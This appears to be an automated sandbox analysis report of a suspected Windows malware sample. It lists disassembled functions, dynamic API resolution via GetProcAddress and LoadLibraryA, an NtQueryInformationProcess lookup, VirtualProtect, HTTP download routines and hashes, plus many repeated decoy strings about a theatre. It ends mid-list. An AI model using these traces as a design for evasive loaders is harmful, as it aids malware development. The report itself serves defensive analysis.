                        control_flow_graph 660 5f9860-5f9874 call 5f9750 663 5f987a-5f9a8e call 5f9780 GetProcAddress * 21 660->663 664 5f9a93-5f9af2 LoadLibraryA * 5 660->664 663->664 666 5f9b0d-5f9b14 664->666 667 5f9af4-5f9b08 GetProcAddress 664->667 669 5f9b46-5f9b4d 666->669 670 5f9b16-5f9b41 GetProcAddress * 2 666->670 667->666 671 5f9b4f-5f9b63 GetProcAddress 669->671 672 5f9b68-5f9b6f 669->672 670->669 671->672 673 5f9b89-5f9b90 672->673 674 5f9b71-5f9b84 GetProcAddress 672->674 675 5f9b92-5f9bbc GetProcAddress * 2 673->675 676 5f9bc1-5f9bc2 673->676 674->673 675->676
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01152398), ref: 005F98A1
                        • GetProcAddress.KERNEL32(74DD0000,011523B0), ref: 005F98BA
                        • GetProcAddress.KERNEL32(74DD0000,011523C8), ref: 005F98D2
                        • GetProcAddress.KERNEL32(74DD0000,011524E8), ref: 005F98EA
                        • GetProcAddress.KERNEL32(74DD0000,01152500), ref: 005F9903
                        • GetProcAddress.KERNEL32(74DD0000,011590C8), ref: 005F991B
                        • GetProcAddress.KERNEL32(74DD0000,01145CD0), ref: 005F9933
                        • GetProcAddress.KERNEL32(74DD0000,01145BB0), ref: 005F994C
                        • GetProcAddress.KERNEL32(74DD0000,01152248), ref: 005F9964
                        • GetProcAddress.KERNEL32(74DD0000,01152260), ref: 005F997C
                        • GetProcAddress.KERNEL32(74DD0000,01152278), ref: 005F9995
                        • GetProcAddress.KERNEL32(74DD0000,01152428), ref: 005F99AD
                        • GetProcAddress.KERNEL32(74DD0000,01145D90), ref: 005F99C5
                        • GetProcAddress.KERNEL32(74DD0000,01152440), ref: 005F99DE
                        • GetProcAddress.KERNEL32(74DD0000,01152290), ref: 005F99F6
                        • GetProcAddress.KERNEL32(74DD0000,01145C50), ref: 005F9A0E
                        • GetProcAddress.KERNEL32(74DD0000,011522A8), ref: 005F9A27
                        • GetProcAddress.KERNEL32(74DD0000,011522C0), ref: 005F9A3F
                        • GetProcAddress.KERNEL32(74DD0000,01145DF0), ref: 005F9A57
                        • GetProcAddress.KERNEL32(74DD0000,011522D8), ref: 005F9A70
                        • GetProcAddress.KERNEL32(74DD0000,01145B90), ref: 005F9A88
                        • LoadLibraryA.KERNEL32(011525C0,?,005F6A00), ref: 005F9A9A
                        • LoadLibraryA.KERNEL32(011525D8,?,005F6A00), ref: 005F9AAB
                        • LoadLibraryA.KERNEL32(01152560,?,005F6A00), ref: 005F9ABD
                        • LoadLibraryA.KERNEL32(01152548,?,005F6A00), ref: 005F9ACF
                        • LoadLibraryA.KERNEL32(011525A8,?,005F6A00), ref: 005F9AE0
                        • GetProcAddress.KERNEL32(75A70000,01152518), ref: 005F9B02
                        • GetProcAddress.KERNEL32(75290000,01152530), ref: 005F9B23
                        • GetProcAddress.KERNEL32(75290000,01152578), ref: 005F9B3B
                        • GetProcAddress.KERNEL32(75BD0000,01152590), ref: 005F9B5D
                        • GetProcAddress.KERNEL32(75450000,01145C30), ref: 005F9B7E
                        • GetProcAddress.KERNEL32(76E90000,01159008), ref: 005F9B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 005F9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 005F9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: fc6d2868c2d9fdd1e991d68248d97ad87a54562a2dd8e22b061a4a746f267979
                        • Instruction ID: 43e6bce7c92b70430e09bb6e56bcf3611d2179ca8f780886ab6dddb9489d58b7
                        • Opcode Fuzzy Hash: fc6d2868c2d9fdd1e991d68248d97ad87a54562a2dd8e22b061a4a746f267979
                        • Instruction Fuzzy Hash: DCA15EB55002449FD36CEFA8EE88A663BF9FF4C701744C52AE645C3264D7399843CB5A
                        Function 005E45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 5e45c0-5e4695 RtlAllocateHeap 781 5e46a0-5e46a6 764->781 782 5e474f-5e47a9 VirtualProtect 781->782 783 5e46ac-5e474a 781->783 783->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E460E
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005E479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E45D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E45DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E46CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E45C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E45E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E46B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E46C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E45F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E4729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E46AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005E46D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 79a3b2d1a9d99d30f1cfc241e9384f28fa128662222473ba593c32b062f0e0df
                        • Instruction ID: 4af30c5f19ecd239d9f598e36b52958d5ae80b7aa4db2b144cdbf43fb67b80a3
                        • Opcode Fuzzy Hash: 79a3b2d1a9d99d30f1cfc241e9384f28fa128662222473ba593c32b062f0e0df
                        • Instruction Fuzzy Hash: B14135617C26547AC63EBBA4884EE9F77B77F4B700F53D242A801522C2CBB079214D2A
                        Function 005E6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005E4839
                          • Part of subcall function 005E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005E4849
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • InternetOpenA.WININET(00600DFE,00000001,00000000,00000000,00000000), ref: 005E62E1
                        • StrCmpCA.SHLWAPI(?,0115E7B8), ref: 005E6303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E6335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0115E3F8,00000000,00000000,00400100,00000000), ref: 005E6385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005E63BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E63D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005E63FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005E646D
                        • InternetCloseHandle.WININET(00000000), ref: 005E64EF
                        • InternetCloseHandle.WININET(00000000), ref: 005E64F9
                        • InternetCloseHandle.WININET(00000000), ref: 005E6503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 372a74356ee09affc4951d3167658defac02a4581f6ed59516753f9dc0ddcf4d
                        • Instruction ID: 7398e74327c623b7cc6eef87f535c7c98f6d088956416e07f69d23a26fe2fbb7
                        • Opcode Fuzzy Hash: 372a74356ee09affc4951d3167658defac02a4581f6ed59516753f9dc0ddcf4d
                        • Instruction Fuzzy Hash: 72714D71A00258ABDF28DBA0CC49BEE7B75FF44740F108198F6096B1D4DBB46A85CF52
                        Function 005F7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: fed4931e966a68f666d0b2f33f866a6d8d123ea0dba7cae30750166367371fee
                        • Instruction ID: b38d19e0b4155d3a6e8adf3b1255af9322084b6d392f048f9a85e842adbb9b2a
                        • Opcode Fuzzy Hash: fed4931e966a68f666d0b2f33f866a6d8d123ea0dba7cae30750166367371fee
                        • Instruction Fuzzy Hash: A4F04FB1944208AFC714DF98DD49FAEBBB8FB08711F10466AFA05A2680C77915058BA1
                        Function 005E1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 3b7ce8ec7ace62a059862e2b7f31c2c29aaf4a04d1584e26fe461ac45e7663df
                        • Instruction ID: d3c2657d10ff2ee609a988374e38e7808ae64f990fd3310c1bf85159bf243562
                        • Opcode Fuzzy Hash: 3b7ce8ec7ace62a059862e2b7f31c2c29aaf4a04d1584e26fe461ac45e7663df
                        • Instruction Fuzzy Hash: EBD05E7490030CDFCB18DFE0DC496EDBB78FB08311F000594D94562340EA305482CAAA
                        Function 005F9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 5f9c10-5f9c1a 634 5fa036-5fa0ca LoadLibraryA * 8 633->634 635 5f9c20-5fa031 GetProcAddress * 43 633->635 636 5fa0cc-5fa141 GetProcAddress * 5 634->636 637 5fa146-5fa14d 634->637 635->634 636->637 638 5fa216-5fa21d 637->638 639 5fa153-5fa211 GetProcAddress * 8 637->639 640 5fa21f-5fa293 GetProcAddress * 5 638->640 641 5fa298-5fa29f 638->641 639->638 640->641 642 5fa337-5fa33e 641->642 643 5fa2a5-5fa332 GetProcAddress * 6 641->643 644 5fa41f-5fa426 642->644 645 5fa344-5fa41a GetProcAddress * 9 642->645 643->642 646 5fa428-5fa49d GetProcAddress * 5 644->646 647 5fa4a2-5fa4a9 644->647 645->644 646->647 648 5fa4dc-5fa4e3 647->648 649 5fa4ab-5fa4d7 GetProcAddress * 2 647->649 650 5fa515-5fa51c 648->650 651 5fa4e5-5fa510 GetProcAddress * 2 648->651 649->648 652 5fa612-5fa619 650->652 653 5fa522-5fa60d GetProcAddress * 10 650->653 651->650 654 5fa67d-5fa684 652->654 655 5fa61b-5fa678 GetProcAddress * 4 652->655 653->652 656 5fa69e-5fa6a5 654->656 657 5fa686-5fa699 GetProcAddress 654->657 655->654 658 5fa708-5fa709 656->658 659 5fa6a7-5fa703 GetProcAddress * 4 656->659 657->656 659->658
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01145DD0), ref: 005F9C2D
                        • GetProcAddress.KERNEL32(74DD0000,01145C70), ref: 005F9C45
                        • GetProcAddress.KERNEL32(74DD0000,011594F0), ref: 005F9C5E
                        • GetProcAddress.KERNEL32(74DD0000,01159370), ref: 005F9C76
                        • GetProcAddress.KERNEL32(74DD0000,01159430), ref: 005F9C8E
                        • GetProcAddress.KERNEL32(74DD0000,01159508), ref: 005F9CA7
                        • GetProcAddress.KERNEL32(74DD0000,0114B658), ref: 005F9CBF
                        • GetProcAddress.KERNEL32(74DD0000,0115CE58), ref: 005F9CD7
                        • GetProcAddress.KERNEL32(74DD0000,0115CE88), ref: 005F9CF0
                        • GetProcAddress.KERNEL32(74DD0000,0115D098), ref: 005F9D08
                        • GetProcAddress.KERNEL32(74DD0000,0115D080), ref: 005F9D20
                        • GetProcAddress.KERNEL32(74DD0000,01145BD0), ref: 005F9D39
                        • GetProcAddress.KERNEL32(74DD0000,01145E30), ref: 005F9D51
                        • GetProcAddress.KERNEL32(74DD0000,01145CF0), ref: 005F9D69
                        • GetProcAddress.KERNEL32(74DD0000,01145D30), ref: 005F9D82
                        • GetProcAddress.KERNEL32(74DD0000,0115D050), ref: 005F9D9A
                        • GetProcAddress.KERNEL32(74DD0000,0115D020), ref: 005F9DB2
                        • GetProcAddress.KERNEL32(74DD0000,0114B860), ref: 005F9DCB
                        • GetProcAddress.KERNEL32(74DD0000,01145AB0), ref: 005F9DE3
                        • GetProcAddress.KERNEL32(74DD0000,0115CEA0), ref: 005F9DFB
                        • GetProcAddress.KERNEL32(74DD0000,0115D038), ref: 005F9E14
                        • GetProcAddress.KERNEL32(74DD0000,0115D068), ref: 005F9E2C
                        • GetProcAddress.KERNEL32(74DD0000,0115CEB8), ref: 005F9E44
                        • GetProcAddress.KERNEL32(74DD0000,01145AD0), ref: 005F9E5D
                        • GetProcAddress.KERNEL32(74DD0000,0115D008), ref: 005F9E75
                        • GetProcAddress.KERNEL32(74DD0000,0115D0B0), ref: 005F9E8D
                        • GetProcAddress.KERNEL32(74DD0000,0115D0C8), ref: 005F9EA6
                        • GetProcAddress.KERNEL32(74DD0000,0115CF90), ref: 005F9EBE
